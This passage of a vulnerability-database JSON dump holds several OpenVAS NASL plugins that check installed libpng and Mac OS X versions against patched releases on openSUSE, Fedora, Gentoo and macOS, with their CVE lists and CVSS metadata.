get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpng16-16\", rpm:\"libpng16-16~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-debuginfo\", rpm:\"libpng16-16-debuginfo~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-compat-devel\", rpm:\"libpng16-compat-devel~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-debugsource\", rpm:\"libpng16-debugsource~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-devel\", rpm:\"libpng16-devel~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-tools\", rpm:\"libpng16-tools~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-tools-debuginfo\", rpm:\"libpng16-tools-debuginfo~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-32bit\", rpm:\"libpng16-16-32bit~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-debuginfo-32bit\", rpm:\"libpng16-16-debuginfo-32bit~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-compat-devel-32bit\", rpm:\"libpng16-compat-devel-32bit~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-devel-32bit\", rpm:\"libpng16-devel-32bit~1.6.6~16.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:53:46", "references": ["2015-2863", "https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151350.html"], "pluginID": "1361412562310869076", "description": "Check the version of libpng10", "edition": 3, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-03-10T00:00:00", "title": "Fedora Update for libpng10 FEDORA-2015-2863", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869076", "id": "OPENVAS:1361412562310869076", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libpng10 FEDORA-2015-2863\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869076\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-10 06:32:34 +0100 (Tue, 10 Mar 2015)\");\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libpng10 FEDORA-2015-2863\");\n script_tag(name: \"summary\", value: \"Check the version of libpng10\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The libpng10 package contains an old\nversion of libpng, a library of functions for creating and manipulating PNG\n(Portable Network Graphics) image format files.\n\nThis package is needed if you want to run binaries that were linked dynamically\nwith libpng 1.0.x.\n\");\n script_tag(name: \"affected\", value: \"libpng10 on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-2863\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151350.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpng10\", rpm:\"libpng10~1.0.63~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:53:01", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151242.html", "2015-2830"], "pluginID": "1361412562310869075", "description": "Check the version of libpng10", "edition": 3, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-03-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for libpng10 FEDORA-2015-2830", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-6954", "CVE-2015-0973", "CVE-2014-9495"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869075", "id": "OPENVAS:1361412562310869075", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libpng10 FEDORA-2015-2830\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869075\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-10 06:32:28 +0100 (Tue, 10 Mar 2015)\");\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\", \"CVE-2013-6954\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libpng10 FEDORA-2015-2830\");\n script_tag(name: \"summary\", value: \"Check the version of libpng10\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The libpng10 package contains an old\nversion of libpng, a library of functions for creating and manipulating PNG\n(Portable Network Graphics) image format files.\n\nThis package is needed if you want to run binaries that were linked dynamically\nwith libpng 1.0.x.\n\");\n script_tag(name: \"affected\", value: \"libpng10 on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-2830\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151242.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpng10\", rpm:\"libpng10~1.0.63~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-24T20:44:08", "references": ["https://support.apple.com/en-us/HT206567"], "pluginID": "1361412562310806695", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-04-01T00:00:00", "title": "Apple Mac OS X Multiple Vulnerabilities-02 March-2016", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mac OS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1841", "CVE-2016-1840", "CVE-2016-1836", "CVE-2015-5312", "CVE-2016-1761", "CVE-2016-1762", "CVE-2016-1834", "CVE-2016-1847", "CVE-2016-1791", "CVE-2016-1765", "CVE-2015-5334", "CVE-2016-1835", "CVE-2015-7500", "CVE-2016-1800", "CVE-2015-8242", "CVE-2015-1819", "CVE-2015-7499", "CVE-2016-1837", "CVE-2016-1759", "CVE-2016-1838", "CVE-2016-1754", "CVE-2015-0973", "CVE-2014-9495", "CVE-2016-1839", "CVE-2015-8472", "CVE-2016-0778", "CVE-2016-1755", "CVE-2015-5333", "CVE-2015-7942", "CVE-2015-8035", "CVE-2016-1833", "CVE-2016-0777"], "modified": "2018-05-23T00:00:00", "id": "OPENVAS:1361412562310806695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_mult_vuln02_mar16.nasl 9940 2018-05-23 15:46:09Z cfischer $\n#\n# Apple Mac OS X Multiple Vulnerabilities-02 March-2016\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806695\");\n script_version(\"$Revision: 9940 $\");\n script_cve_id(\"CVE-2016-1754\", \"CVE-2016-1755\", \"CVE-2016-1759\", \"CVE-2016-1761\",\n \"CVE-2016-1765\", \"CVE-2015-8472\", \"CVE-2015-1819\", \"CVE-2015-5312\",\n \"CVE-2015-7499\", \"CVE-2015-7500\", \"CVE-2015-7942\", \"CVE-2015-8035\",\n \"CVE-2015-8242\", \"CVE-2016-1762\", \"CVE-2016-0777\", \"CVE-2016-0778\",\n \"CVE-2015-5333\", \"CVE-2015-5334\", \"CVE-2014-9495\", \"CVE-2015-0973\",\n \"CVE-2016-1791\", \"CVE-2016-1800\", \"CVE-2016-1833\", \"CVE-2016-1834\",\n \"CVE-2016-1835\", \"CVE-2016-1836\", \"CVE-2016-1837\", \"CVE-2016-1838\",\n \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-1841\", \"CVE-2016-1847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 17:46:09 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-01 13:19:35 +0530 (Fri, 01 Apr 2016)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-02 March-2016\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, trigger a dialing action via a\n tel: URL, bypass a code-signing protection mechanism.\n Impact Level: System\");\n\n script_tag(name: \"affected\" , value:\"Apple Mac OS X versions 10.9.x before 10.9.5\n and 10.10.x before 10.10.5\");\n\n script_tag(name: \"solution\" , value:\"Apply the appropriate security patch from\n the vendor. For updates refer to Reference links\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name : \"URL\" , value : \"https://support.apple.com/en-us/HT206567\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^(10\\.(9|10))\"){\n exit(0);\n}\n\nif((osVer == \"10.9.5\") || (osVer == \"10.10.5\"))\n{\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(!buildVer){\n exit(0);\n }\n if(osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1808\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n else if(osVer == \"10.10.5\" && version_is_less(version:buildVer, test_version:\"14F1808\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.9\", test_version2:\"10.9.4\")){\n fix = \"10.9.5 build 13F1808\";\n}\nelse if(version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"10.10.5 build 14F1808\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-24T20:45:25", "references": ["https://support.apple.com/en-us/HT206167"], "pluginID": "1361412562310806693", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "edition": 2, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-04-01T00:00:00", "title": "Apple Mac OS X Multiple Vulnerabilities-01 March-2016", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mac OS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1746", "CVE-2016-1734", "CVE-2015-8659", "CVE-2016-1773", "CVE-2015-8126", "CVE-2016-1768", "CVE-2016-1758", "CVE-2015-5312", "CVE-2016-1761", "CVE-2015-3195", "CVE-2016-1744", "CVE-2016-1762", "CVE-2016-1737", "CVE-2016-1765", "CVE-2015-7551", "CVE-2016-1738", "CVE-2016-1756", "CVE-2016-1747", "CVE-2016-1752", "CVE-2016-1736", "CVE-2016-1740", "CVE-2016-1743", "CVE-2016-1775", "CVE-2016-1749", "CVE-2015-7500", "CVE-2016-0802", "CVE-2015-8242", "CVE-2016-1770", "CVE-2016-1757", "CVE-2015-1819", "CVE-2015-7499", "CVE-2016-1741", "CVE-2016-1759", "CVE-2016-1745", "CVE-2016-1732", "CVE-2016-1769", "CVE-2016-1754", "CVE-2015-0973", "CVE-2016-1950", "CVE-2016-1750", "CVE-2016-1748", "CVE-2014-9495", "CVE-2016-0801", "CVE-2015-8472", "CVE-2016-1764", "CVE-2016-0778", "CVE-2016-1755", "CVE-2016-1767", "CVE-2016-1753", "CVE-2016-1733", "CVE-2016-1788", "CVE-2016-1735", "CVE-2015-7942", "CVE-2015-8035", "CVE-2016-0777"], "modified": "2018-05-23T00:00:00", "id": "OPENVAS:1361412562310806693", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806693", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_mult_vuln01_mar16.nasl 9935 2018-05-23 13:15:24Z santu $\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 March-2016\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806693\");\n script_version(\"$Revision: 9935 $\");\n script_cve_id(\"CVE-2015-7551\", \"CVE-2016-1733\", \"CVE-2016-1732\", \"CVE-2016-1734\",\n \"CVE-2016-1735\", \"CVE-2016-1736\", \"CVE-2016-1737\", \"CVE-2016-1740\",\n \"CVE-2016-1738\", \"CVE-2016-1741\", \"CVE-2016-1743\", \"CVE-2016-1744\",\n \"CVE-2016-1745\", \"CVE-2016-1746\", \"CVE-2016-1747\", \"CVE-2016-1748\",\n \"CVE-2016-1749\", \"CVE-2016-1752\", \"CVE-2016-1753\", \"CVE-2016-1754\",\n \"CVE-2016-1755\", \"CVE-2016-1756\", \"CVE-2016-1757\", \"CVE-2016-1758\",\n \"CVE-2016-1759\", \"CVE-2016-1761\", \"CVE-2016-1764\", \"CVE-2016-1765\",\n \"CVE-2016-1767\", \"CVE-2016-1768\", \"CVE-2016-1769\", \"CVE-2016-1770\",\n \"CVE-2016-1773\", \"CVE-2016-1775\", \"CVE-2016-1750\", \"CVE-2016-1788\",\n \"CVE-2015-8126\", \"CVE-2015-8472\", \"CVE-2015-8659\", \"CVE-2015-1819\",\n \"CVE-2015-5312\", \"CVE-2015-7499\", \"CVE-2015-7500\", \"CVE-2015-7942\",\n \"CVE-2015-8035\", \"CVE-2015-8242\", \"CVE-2016-1762\", \"CVE-2016-0777\",\n \"CVE-2016-0778\", \"CVE-2015-3195\", \"CVE-2014-9495\", \"CVE-2015-0973\",\n \"CVE-2016-1950\", \"CVE-2016-0801\", \"CVE-2016-0802\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 15:15:24 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-01 13:19:28 +0530 (Fri, 01 Apr 2016)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 March-2016\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, trigger a dialing action,\n bypass a code-signing protection mechanism.\n\n Impact Level: System\");\n\n script_tag(name: \"affected\" , value:\"Apple Mac OS X versions 10.11.x before\n 10.11.4, 10.9.x through 10.9.5, 10.10.x through 10.10.5\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apple Mac OS X version\n 10.11.4 or later, or apply aptch from vendor. For more updates refer\n to https://www.apple.com\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name : \"URL\" , value : \"https://support.apple.com/en-us/HT206167\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^(10\\.(9|10|11))\"){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.9\", test_version2:\"10.9.4\")||\n version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n}\n\nelse if((osVer == \"10.10.5\") || (osVer == \"10.9.5\"))\n{\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(!buildVer){\n exit(0);\n }\n if(osVer == \"10.10.5\" && version_is_less(version:buildVer, test_version:\"14F1713\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n else if(osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1712\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n}\n\nelse if(osVer =~ \"^(10\\.11)\")\n{\n if(version_is_less(version:osVer, test_version:\"10.11.4\")){\n fix = \"10.11.4\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:29:28", "references": ["https://security.gentoo.org/glsa/201502-10"], "pluginID": "1361412562310121349", "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201502-10", "edition": 3, "reporter": "Eero Volotinen", "published": "2015-09-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201502-10", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9495"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121349", "id": "OPENVAS:1361412562310121349", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201502-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121349\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:28:31 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201502-10\");\nscript_tag(name: \"insight\", value: \"Two vulnerabilities have been discovered in libpng:\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201502-10\");\nscript_cve_id(\"CVE-2014-9495\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201502-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.6.16\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.5.21\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.52\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.53\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.54\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.55\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.56\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.5.22\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.5.23\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.5.24\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.5.25\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(), vulnerable: make_list(\"lt 1.6.16\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": 